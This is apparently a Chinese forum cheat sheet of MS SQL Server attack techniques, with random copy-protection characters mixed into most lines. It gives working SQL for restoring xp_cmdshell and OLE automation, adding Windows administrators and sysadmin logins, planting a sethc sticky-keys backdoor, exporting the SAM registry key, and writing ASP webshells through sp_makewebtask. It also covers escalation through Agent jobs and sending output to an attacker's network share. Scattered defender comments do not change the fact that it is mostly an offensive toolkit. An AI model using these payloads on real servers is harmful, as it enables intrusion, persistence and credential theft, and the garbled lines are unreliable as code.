1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号! z3 n0 h. I# s5 x
恢复方法:查询分析器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
9 j6 u3 e; {5 U/ W! l8 c! G( |* E; z第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- h9 e" U7 V3 N+ `* b; t8 h0 P2 R8 U2 ?然后按F5键命令执行完毕
3 b3 e4 C$ S0 o6 s
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分析器连接后,
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
+ r. c7 x, n2 G9 p7 [" F/ M第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! w6 j+ ]0 G5 U8 K- R# p$ T. R
然后按F5键命令执行完毕
a$ ~" y! c+ x% n( Q& Q' F7 |: p! Z: y0 l5 d# D8 m/ y! r
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分析器连接后,
1 g- I) E# o% }" b第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 U4 M4 Q+ k# x8 j3 }6 e X$ d第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' / _. s1 s( H5 ^5 ]* e3 q
然后按F5键命令执行完毕
8 K+ I8 k' m$ U) K% l( m' b- W* ~8 b$ {! Z0 a( ^! }
4 终极方法.
' N1 ?2 s3 M5 G( E5 c/ r+ [如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:. d; ^1 y5 j$ o/ D- ]- P8 _* t
查询分析器连接后,
2000servser系统:5 i3 S. S9 _' v
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
9 A) g0 B3 g3 l% `5 G3 R+ ]& h5 ]% _3 U" q! g6 u- X+ T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'- z9 m4 x1 Y' x" B$ C( s
+ n4 _7 @/ P, F. x5 `7 b( X4 rxp或2003server系统: y( o. e$ j. y! M
* x2 R, P+ I& \. \; h5 e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'- q( ^) p% E0 j% f
" y# d* Q7 O3 g r, R c: Hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
: d0 I3 @% F6 }, w$ b) J3 r. f; f' H
$ [+ P7 L0 e. o, c5 g0 C" Z T" C. a, t1 k8 ?" {0 T: l+ [
五个SHIFT
4 ?3 A8 h$ M/ l Fdeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
4 L# Z/ y5 L3 M
5 @1 u" q$ `8 a- S9 Hdeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
3 z1 o: f3 i' r L5 ^
3 q6 b# a7 _1 J% wxp_cmdshell执行命令另一种方法- |1 T9 J6 T- s; [
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
G& E. A" ?' }" M$ f
0 b5 U/ v6 S0 |0 X6 y; X4 M. h4 S; k判断存储扩展是否存在0 v* ?/ V- E3 }7 ?7 w$ i* i
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK!
! o. X' `2 m2 B( M
! B M9 P( Y# q& N# s8 v9 }
上传xplog70.dll恢复xp_cmdshell语句:
2 s- K: Z- w+ A8 ?& q% Lsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
4 v+ m. x' }# V- n
& @; n ]9 a1 H. h# p0 ^0 `否则上传xplog7.0.dll% G8 P* x& E" G2 Z3 s+ {. {* [
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll' r0 s- P, s$ x5 {9 P% l
# C; S1 {9 D9 r( f' ~% N4 B4 X \; V0 O- [7 S6 `" L
, y4 ^& }# E4 W/ e& u- q0 \: R
首先开启沙盘模式:: y0 t6 P. @' C9 Y" O0 `
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
+ q& @2 G4 u3 l3 n7 y
, z. ^/ |, C2 ?. {; h4 G" p然后利用jet.oledb执行系统命令; F! l! A; D6 M) j: Y9 J
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')3 K+ F- b! u/ o, L! ?/ p
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
8 O3 _5 ^: ?# ^7 @) L; ]& X# {
9 N9 p! @" V# J0 B! o4 p' W. K: c3 j6 N
' i+ m# g! X9 z( s I& L. j
恢复过程sp_addextendedproc 如下:
-- Re-creates the system procedure that registers an extended stored procedure
-- (an exported function in a DLL) under a name callable from T-SQL.
-- Parameters: @functname = (owner.)name to register, @dllname = DLL holding it.
-- Returns 1 if called inside an open transaction, 0 otherwise.
-- NOTE(review): the lines below carry copy-protection noise at their start and
-- end, so the listing does not parse as printed.
-- Defender note: extended procedures execute inside the server process, so any
-- sp_addextendedproc / dbcc addextendedproc call naming an unexpected DLL path
-- is worth auditing, as is the re-creation of this procedure itself.
- B) A5 }3 p3 q1 R' Fcreate procedure sp_addextendedproc --- 1996/08/30 20:13
* @# L0 T& Z' ?" U; K6 r@functname nvarchar(517),/* (owner.)name of function to call */ . B# M# y% J" n4 n* E
@dllname varchar(255)/* name of DLL containing function */ - r5 y" t6 C) X
as * j h7 T+ a. e- ~0 x7 W5 P' w
-- Refuses to run inside an open transaction: raises error 15002 and returns 1.
set implicit_transactions off 8 Y ^* ]7 j, M. \" D: S2 J
if @@trancount > 0 ) X! y# B0 f0 H, J1 |
begin
- Q* Z; E3 u3 F P/ w& N5 Mraiserror(15002,-1,-1,'sp_addextendedproc') ) \* f6 j+ p* e; @1 ]3 M: x
return (1) ; \* O( R$ B( e5 X3 c3 @8 n
end
-- The registration itself is a DBCC command rather than catalog DML.
" l% b( G2 f H. f) tdbcc addextendedproc( @functname, @dllname)
. F+ S. y* U! X% W s! ]1 B. Vreturn (0) -- sp_addextendedproc
* }, l g7 b- Q3 XGO : L0 O$ c& I9 X5 ~( }) l
3 Y- F4 r7 w3 `( C4 y
* g$ ~8 b3 v* l! H2 O9 H" `* N% Q: N
! f! |' `6 k- m. M) s导出管理员密码文件
' Y4 D/ s' @6 J5 i x" ^1 ~sa默认可以读sam键.应该。+ c: S0 F: u2 r- _
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg: Q; A, Z- U. H' O0 N
net user administrator test
3 @; N7 h# W7 D$ A' ^4 d用administrator登陆.
* T9 D% K* {4 C' Z4 q! U用完机器后
; B+ ^0 r" E6 p" @reg import c:\test.reg* G# n: h4 J4 `# F' y
根本不用克隆.
" N1 R( \& f& |) `5 o: C找到对应的sid.
) E4 \; q0 N' n; w- [3 C
Q7 Z. L% ~: N( ?3 y' d9 y
. c2 H: o% |% \" o( e" Y
5 ]# e7 x$ W; T: l1 R8 W) Y. b! n恢复所有存储过程
' e6 S: z' g- a5 [7 E2 V' `use master
+ J; Y; q1 n0 i8 n, K2 Oexec sp_addextendedproc xp_enumgroups,'xplog70.dll'
7 r9 G3 Q' Z) |1 I* d6 c0 k% fexec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 4 e1 v v$ I, o, p
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' 9 K/ K% A# c7 q+ d2 `+ k0 W
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
, c7 |/ M& i* ^& ~- P( eexec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 4 m1 W$ K4 w4 X/ R* c3 i9 N6 T8 z
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
# w5 h4 b: Z; o/ E" z, G8 i0 yexec sp_addextendedproc sp_OADestroy,'odsole70.dll'
& }: g/ v' M; \# N# dexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
! }: ?% O3 c5 T" Aexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' 9 s6 X5 g* x4 \( N
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
0 m8 w! H0 b* O ~7 }' y! [( kexec sp_addextendedproc sp_OASetProperty,'odsole70.dll' ; j3 j2 Q7 C) B; j
exec sp_addextendedproc sp_OAStop,'odsole70.dll' H) J: H5 b/ J: |: a2 T4 F
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 4 e: w$ R. S2 E+ t
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
/ k4 C1 Q* R) }% I8 ?exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' ( S" Z4 e; Q/ w
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' 2 K% @: c* O' m
exec sp_addextendedproc xp_regread,'xpstar.dll' - a9 T O4 U+ Q# n: ~3 m4 x
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 4 C. \% H9 B8 _* w
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
6 f( U. Z" A4 Sexec sp_addextendedproc xp_availablemedia,'xpstar.dll'
8 S2 N7 g. I2 P; ^( i/ L1 j) @
7 Z: ^9 d6 G* R0 Y, V
2 S) I: _5 g) u' }) W9 e& U建立读文件的存储过程
-- Creates a helper that returns the contents of a server-side text file as rows.
-- Parameter: @filename = path of the file, read via BULK INSERT.
-- Defender note: this is a generic file-read primitive for whoever can execute
-- it. BULK INSERT needs bulk-operation rights, and the path is spliced into
-- dynamic SQL without escaping, so the @filename argument is itself injectable.
-- Procedures that wrap BULK INSERT in EXEC('...' + @param) are worth flagging.
-- NOTE(review): lines carry copy-protection noise and do not parse as printed.
# p9 }1 q# f: \9 S" NCreate proc sp_readTextFile @filename sysname
- m. S; B3 `6 q' C qas
' s' T* U2 G1 e8 a. s; u% Y( p8 ^2 c. c6 `
begin ( ?: S$ h) q/ u9 e0 h
set nocount on - q/ `, q( Y) m4 l/ K" F* z8 g
-- Single varchar(8000) column; the file is loaded into it row by row.
Create table #tempfile (line varchar(8000))" w8 Y7 O2 S. ?* r1 R' v2 K" S e
-- Path concatenated straight into the statement text, then executed.
exec ('bulk insert #tempfile from "' + @filename + '"')& I1 U& _% I9 |2 W/ x" r: u+ k2 \
select * from #tempfile/ I& w. b6 J9 y- q9 \; V
drop table #tempfile
' E& w: `$ ]; y! s' Q/ EEnd) ] Z* L8 S/ d
! @% ~# k0 v ^9 v) lexec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件4 y9 s" h; c) p- _1 Y; r% z6 _
查看登录用户
$ N* z5 ]3 X1 x! Y* d# w' b" wSelect * from sysxlogins# Q8 V7 } w+ K3 Q- V' c
5 z+ H/ q! u0 ]* M% G' Y; z. W把文件内容读取到表中
$ `* C7 W9 m6 e# J K' cBULK INSERT tmp from "c:\test.txt"/ a$ H' p: `6 ^ b) ~; T4 w
dElete from 表名 清理表里的内容) D7 T" ` \! \6 X @' k5 _
create table b_test(fn nvarchar(4000));建一个表,字段为fn
. i3 h+ _& E: o
3 \: G( ?# U5 N* I6 ?! F# C
, O) g. p: {+ C6 L7 ^# l( q: M加sa用户
/ D# ~% I" I3 W) d+ oexec master.dbo.sp_addlogin user,pass;; i2 O# N) ?9 k+ {- p% ]8 c
exec master.dbo.sp_addsrvrolemember user,sysadmin, A& i( ~; ]( R( D) @3 r" ?8 t. h
8 M8 y' J; ?# H8 V8 Q
1 y: P1 s" ?. v; z0 B% Y( V
9 R0 M7 R" J7 M读文件代码
-- Reads a text file line by line through OLE Automation (Scripting.FileSystemObject)
-- and prints each line; '文件名' is a placeholder literal meaning "file name".
-- Defender note: this only works while 'Ole Automation Procedures' is enabled
-- (the enabling statement appears later on this page); keeping it off and
-- auditing sp_OACreate calls from the engine closes this file-access path.
-- NOTE(review): @o and @f are never released (no sp_OADestroy) and @t is unused;
-- lines carry copy-protection noise and do not parse as printed.
- F) {5 d3 |- ~1 X3 _( gdeclare @o int, @f int, @t int, @ret int
" U8 @1 B9 L5 @declare @line varchar(8000)
# D5 }% w* K8 F1 B% Aexec sp_oacreate 'scripting.filesystemobject', @o out
-- Trailing 1 is presumably the FSO read mode -- confirm against the FSO docs.
. r$ N' K Q3 `4 k% s hexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
N+ r9 i9 j$ k1 ]; Y: x9 f* _, V+ Vexec @ret = sp_oamethod @f, 'readline', @line out
-- Loop ends on the first non-zero return from readline (end of file or error).
: x. A! L$ x& N$ s1 y* iwhile( @ret = 0 )
# w5 c" Q3 i9 H, L7 ?begin
2 K) L' V" j2 Z7 kprint @line7 D9 }3 i' F* [9 @" i Q% @
exec @ret = sp_oamethod @f, 'readline', @line out
3 C. X* Y3 G: i( c2 Jend+ j* o* A+ a* I0 K
% j4 y; j6 V5 y- U: b& k& g1 m$ @& Z3 Z1 H; z; _4 ?# _2 V6 o, l
写文件代码:) |) E/ p3 k! U7 _6 V; b3 [
-- Creates a text file through OLE Automation and writes one line into it; the
-- path shown is a third-party FTP daemon's configuration file, and 《内容》 is
-- an untranslated placeholder ("content") that is not valid T-SQL as printed.
-- Defender note: file writes into service configuration directories from the
-- SQL Server process are a strong indicator; file-integrity monitoring on such
-- files and disabling 'Ole Automation Procedures' both cut this path off.
declare @o int, @f int, @t int, @ret int$ u& k- P3 q8 n% g9 G. Z3 L" }$ h
exec sp_oacreate 'scripting.filesystemobject', @o out7 i) A3 V/ }$ |
-- Trailing 1 is presumably the overwrite flag of CreateTextFile -- confirm.
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 10 z, u! b4 d, f& C
-- @t is declared but never used; @f is never released with sp_OADestroy.
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
! T; a9 J6 Q2 g$ j9 A" p' i! Z5 K' q
3 J- K; i8 |3 ^$ R5 {$ v! O添加lake2 shell; \2 Q: u; [* e3 O8 O: S
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'1 ~" R+ C) e% r$ Y" e6 ~8 } U* X
sp_dropextendedproc xp_lake2: a+ J3 \! @- Z x; f) D& Z
EXEC xp_lake2 'net user'
6 M* Q6 J9 @7 Q& [4 U& `) W; N: c
7 g; i2 a) `, C% d. f6 B8 k* T( {) Q4 N0 B f
得到硬盘文件信息 8 a6 a# r. Z4 D2 F# k* P7 @4 ?4 \0 c
--参数说明:目录名,目录深度,是否显示文件 1 Z6 a; z1 ]6 z* p7 h7 ^% N4 h
execute master..xp_dirtree 'c:'
4 ?2 R' I" n: F4 o0 l7 ^execute master..xp_dirtree 'c:',1 # I: y. Q K* q3 U7 w3 V
execute master..xp_dirtree 'c:',1,1 & X5 A$ t6 I; C `
1 A* }6 k8 {9 x: p) P$ Z
D# j! b$ _) H$ B读serv-u配置信息
' [- ^' d0 N" D% jexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
7 I* C4 g# L( h0 F. J3 s2 zexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'; q1 Q( |# k* Y
3 w: o9 [ V4 a1 e! L通过xp_regwrite写SHIFT后门. [5 A9 n8 f% C: G# K: w8 _2 l
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
, _+ n- x2 z& K1 R3 J E/ X- x t5 b6 X; a8 X
: q j9 { t P6 D
& z3 O' M& ~8 g+ z! ~: e8 T找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';! w' r2 ]( m6 G3 X9 G6 j8 J$ r
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
7 @7 @. O" z/ l3 o& y' q
% m2 ^2 {+ D' j9 I: i1 |* tEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
5 }/ N, e z9 h8 @1 b8 U; w& ?" V1 P# ^$ Z0 K7 ?
; A. O$ A X1 S ^3 ?' j2 @
sql server 2005下开启xp_cmdshell的办法
! `0 D- t( Q% f6 R# H
+ w- L5 O# v3 G0 t0 c$ sEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
1 G" `7 G8 _2 z2 m( f8 H& {- d% ?. r/ K2 p
SQL2005开启'OPENROWSET'支持的方法:
! J7 f6 @5 z/ d+ q# r. ]9 ?8 w' d- q1 s9 U- [0 u! v' X
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
3 M6 a& ]7 G4 U8 @% k/ n
SQL2005开启'sp_oacreate'支持的方法:
# x; @( m" J1 t1 F( T4 @1 L8 S
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;5 R, \* d9 J k1 F% c, P V! P. i% C
2 F" p; ]& W; t
L( |7 f+ j4 S
; K" y s: p2 Y& P, i, W
( ~! p1 u; b2 k& v$ }- x! f8 n+ y- I9 F4 F+ [- a9 w( F t4 R0 D2 |
* w3 c1 j# Z$ c' F5 L W( A* H5 ]/ Q- _5 o0 d
U) |7 O. j% K m
/ i5 h' o a$ L w& h2 ?, Y" [9 t+ Y8 y& n* l) R
; m% K4 I6 b& ^+ F6 P4 V: A% Y, n6 ]8 h
) s2 L8 s Y9 T9 {+ F- X
4 D, m! ^" d7 g1 s8 T' o
# N# v) q; K. o4 v. I8 Y$ ~4 ?! V9 J0 W, K8 l4 g6 b( h% i
) v6 {' r/ I* y1 c' g O
5 o- N: w; v% W0 v/ d! I
; c) _4 A4 n5 \( X: G0 y& Y5 K1 H j
& {: w( I$ v4 w( c
% W2 x) h% _, S Z7 l U% W& F$ Y6 l/ b8 J' I" ^
: w. Z) x1 G0 l5 y* L
以下方法不知道能不能成功,暂且留下研究哈:
4)
A, G2 p2 v* h( xuse msdb; --这儿不要是master哟/ }" d, H8 p# v1 r
exec sp_add_job @job_name= czy82 ;
3 s/ @7 b: j, V' Sexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
& Q) y, L! Z6 |- ?* ?0 f2 u) Rexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
/ a% Z( k# J; _: t8 z# R }exec sp_start_job @job_name= czy82 ;# u0 n6 ?* ?1 y( r9 }
$ S! _0 \, R9 T
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
执行tsql语句了.
对于这几个存储过程的使用,第一,在@server_name我们要指定你的sql的服务器名;
第二,系统的sqlserveragent服务必须打开(默认没打开的,气人了吧)!
net start SQLSERVERAGENT" q$ g4 @5 N" Y
+ B9 e8 H* A% G, }! i
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
7 ^- a0 z7 I, ^9 K4 k6 m; ZUSE msdb
$ ^: i; t; k, @, l( `0 BEXEC sp_add_job @job_name = GetSystemOnSQL ,$ L$ }* N* t' E7 w/ o3 w* U: i
@enabled = 1,
, A( [( O- b- m$ E A- F% }@description = This will give a low privileged user access to" A6 l! R& H+ v% C6 j7 b) U
xp_cmdshell ,
1 W4 S7 l/ J# {6 @0 P! ~$ I# v8 f@delete_level = 1# ^ q# J* T4 O* K. T
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
" `) f, R( o; c5 [@step_name = Exec my sql ,7 D9 t% n4 v6 l7 ?# h1 W4 u9 |
@subsystem = TSQL ,
8 g5 {& B- j! o) Z: w@command = exec master..xp_execresultset N select exec+ S, V7 H# @! I w3 `+ ~7 i2 U
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
0 g0 ]6 q4 }! [9 zEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,: L! C! O% {# T0 d
@server_name = 你的SQL的服务器名 + \3 p# \( c4 d8 b) f+ U
EXEC sp_start_job @job_name = GetSystemOnSQL % `4 G+ k4 i/ K7 r
! P3 x- T" |, A7 W8 @( H不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以7 |: n" B: c3 ^- \. @9 x: l/ M3 v
才让我们可以以public执行xp_cmdshell/ {. j, Q A: [' ^$ Y- u" t
# a: V2 n/ a+ N" I# Y; g1 d- U
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以). h! V+ Z: H; g( Q$ M' ?( Y
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
X6 _- W* l9 W, S6 b) |0 V/ F5 x7 {8 e/ l5 R
USE msdb
/ p& T1 d7 g" T! qEXEC sp_add_job @job_name = ArbitraryFilecreate , C9 o0 c a) p6 B9 s$ E
@enabled = 1,
* M8 s1 \$ c& c4 X u8 P5 x9 ^@description = This will create a file called c:\sqlafc123.txt ,
4 g$ z* m3 @6 E@delete_level = 1
: f$ q$ R# r% q _EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
- n: L: l3 A1 n( ?( e; d5 U4 _@step_name = SQLAFC ,) C$ v! X5 _5 L1 T. h4 x, |9 p
@subsystem = TSQL ,! o1 e3 K, A9 |* {
@command = select hello, this file was created by the SQL Agent. ,
( |; ^ p5 [( F+ H C y4 z9 \@output_file_name = c:\sqlafc123.txt
, `' S$ L6 N" }7 }$ D! IEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
/ N% h/ B& n/ C" w7 p! I( b2 m& W@server_name = SERVER_NAME
# P0 h: r1 j% z: ]3 a; }2 JEXEC sp_start_job @job_name = ArbitraryFilecreate 2 }" [1 A$ M& ?/ Y$ w
- [4 M- t9 j( x) M0 U# K$ k7 S+ v
如果subsystem选的是:tsql,在生成的文件的头部有如下内容# ^0 N4 v# H; Z# n( s
) S& T) l7 [2 D2 A/ \# ?/ s3 \9 @6 [, j??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19& r/ k7 x( J& y0 ^ L% d% P+ v8 R
----------------------------------------------# q( k7 i3 @* f- w! Y- m9 C) W
hello, this file was created by the SQL Agent.; y9 N9 N9 ^: t: U1 a
4 S; y% i/ f' J(1 ?????); M, t8 I# I4 s# c4 R: A4 B
$ x. A$ C$ q* p" e
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员. z6 j7 h( d: f( {7 ^
命令的vbs文件到启动目录!! J3 C4 J7 g1 M& r
5 E; S. F0 N* f* g3 z0 [
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)& C& y; U: V0 m, M- {; k8 ^2 P
关于sp_MScopyscriptfile 看下面的例子
7 @6 | J) H8 }! r1 U* ~declare @command varchar(100)
+ c# d/ }% T6 W( \# _declare @scripfile varchar(200) . q7 N( M( m+ H) s2 x# O
set concat_null_yields_null off 8 z g% U1 P$ L$ h9 x
select @command= dir c:\ > "\\attackerip\share\dir.txt"
}+ Z( ]$ H& m( N8 y e* p9 Vselect @scripfile= c:\autoexec.bat > nul" | @command | rd " , f. g7 u$ I }( F. W
exec sp_MScopyscriptfile @scripfile ,
! ^$ l" ^. O, R9 _2 [4 ^
这两个东东都还在测试哟
2 V; i! u$ b6 T$ n# r, z让MSSQL的public用户得到一个本机的web shell 2 y) q, n) q$ d' N) Q
+ `( \3 u% g! p3 @, e
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
( j, K/ D$ [2 x- O5 M--@query= select <img src=vbscript:msgbox(now())>
" s7 F" f/ `1 u--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> ' p: N" K* v# T9 j% V. l
@query= select ( @6 C6 ], ~& R1 O. m) L. f
<%On Error Resume Next / l) S! L. \6 S% w, x! i
Set oscript = Server.createObject("wscript.SHELL")
# ?( I6 R$ s# k USet oscriptNet = Server.createObject("wscript.NETWORK")
+ _0 x; q/ B4 R/ q. ySet oFileSys = Server.createObject("scripting.FileSystemObject") " y; M) G+ \, W3 {3 a
szCMD = Request.Form(".CMD") ' }& y& ?: G; D
If (szCMD <>"")Then
4 n7 e% h) X) ]' oszTempFile = "C:\" & oFileSys.GetTempName() & d0 H! |. f, y' ?* K; b( }0 n6 y
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
5 n O+ w/ E# A; ySet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) / c- f; e0 X6 P5 ?4 n
End If %>
9 l3 o1 u( a+ ?8 F/ H$ B<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
& b& [! h; ]! I/ R. o1 j3 M# {<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> 7 a0 I3 R3 V+ n7 }
</FORM>< RE> " a, H2 R# _% P6 ^: n' |* H$ `/ C
<% If (IsObject(oFile))Then 2 \% k4 T! h4 P
On Error Resume Next
- y4 X$ O: h- v3 R1 QResponse.Write Server.HTMLEncode(oFile.ReadAll) " p5 y' H; }8 G- v$ U" }# a
oFile.Close
, ?5 Z9 J( f: { t- i; p. OCall oFileSys.deleteFile(szTempFile, True) 5 S& ]" j& v# ?
End If%>
* \( R( f0 k X+ p: C</BODY></HTML>
1 w+ M4 Q( ^9 y8 m3 }1 f9 R+ r |